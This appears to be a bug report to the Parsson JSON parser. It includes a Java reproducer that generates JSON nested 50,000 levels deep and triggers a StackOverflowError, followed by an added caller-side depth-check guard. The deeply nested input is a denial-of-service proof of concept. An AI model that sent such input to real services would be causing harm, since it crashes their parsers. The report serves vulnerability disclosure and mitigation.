parsson: stack overflow when parsing deeply nested input
I'm a contributor to Jackson and we've been getting a lot of people raising issues, expecting that Jackson handles malicious inputs in a graceful way.
I will add a test case at the bottom of this email that demonstrates that a very deeply nested JSON input will make Parsson 1.1.2 throw a StackOverflowError. It is based on a jackson-core test.
Get back to me if you want more details.
Steps to reproduce
import jakarta.json.Json;
import jakarta.json.stream.JsonParser;
import java.io.StringReader;

public class Main {
    public static void main(String[] args) {
        try {
            // 50000 levels of nested object/array pairs
            String json = createDeepNestedDoc(50000);
            try (JsonParser parser = Json.createParser(new StringReader(json))) {
                while (parser.hasNext()) {
                    JsonParser.Event ev = parser.next();
                    if (ev == JsonParser.Event.START_ARRAY) {
                        // Materialising the nested array is where the StackOverflowError is thrown
                        parser.getArray();
                    }
                }
            }
        } catch (Throwable t) {
            // Throwable, not Exception: StackOverflowError is an Error
            t.printStackTrace();
        }
    }

    // Builds [{ "a": [{ "a": [ ... "val" ... ]}]}] nested `depth` times
    private static String createDeepNestedDoc(final int depth) {
        StringBuilder sb = new StringBuilder();
        sb.append("[");
        for (int i = 0; i < depth; i++) {
            sb.append("{ \"a\": [");
        }
        sb.append(" \"val\" ");
        for (int i = 0; i < depth; i++) {
            sb.append("]}");
        }
        sb.append("]");
        return sb.toString();
    }
}
What are the affected versions?
not defined
Do you know any mitigations of the issue?
not defined
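
A possible caller-side guard for the failure reported above, as an added example that is not part of the original report or of Parsson: an iterative pre-scan that rejects input nested deeper than a limit before it reaches the parser. The class name `NestingGuard`, the method `withinDepth` and the limit of 1000 are assumptions made for the illustration.

```java
import java.io.IOException;
import java.io.Reader;
import java.io.StringReader;

public class NestingGuard {
    // Hypothetical limit for this example; choose one that fits your documents.
    static final int MAX_DEPTH = 1000;

    // Returns false as soon as arrays/objects nest deeper than maxDepth.
    // The scan is a plain loop, so its own stack use does not grow with the input.
    // Brackets inside string literals are ignored, including after an escaped quote.
    static boolean withinDepth(Reader in, int maxDepth) throws IOException {
        int depth = 0;
        boolean inString = false;
        boolean escaped = false;
        for (int c = in.read(); c != -1; c = in.read()) {
            if (inString) {
                if (escaped) {
                    escaped = false;          // character after a backslash is literal
                } else if (c == '\\') {
                    escaped = true;
                } else if (c == '"') {
                    inString = false;
                }
            } else if (c == '"') {
                inString = true;
            } else if (c == '[' || c == '{') {
                if (++depth > maxDepth) {
                    return false;             // stop early, do not read the rest
                }
            } else if (c == ']' || c == '}') {
                depth--;
            }
        }
        return true;
    }

    public static void main(String[] args) throws IOException {
        // Constructed input: brackets inside a string must not count as nesting.
        String shallow = "{\"a\": [\"]] [[ \\\" {{\"]}";
        // Constructed input: same opening shape as the reproducer, depth 50000.
        StringBuilder deep = new StringBuilder("[");
        for (int i = 0; i < 50000; i++) {
            deep.append("{ \"a\": [");
        }
        System.out.println(withinDepth(new StringReader(shallow), MAX_DEPTH));
        System.out.println(withinDepth(new StringReader(deep.toString()), MAX_DEPTH));
    }
}
```

The scan consumes the reader, so open a fresh one for the actual parse; it checks nesting only and does not validate the JSON.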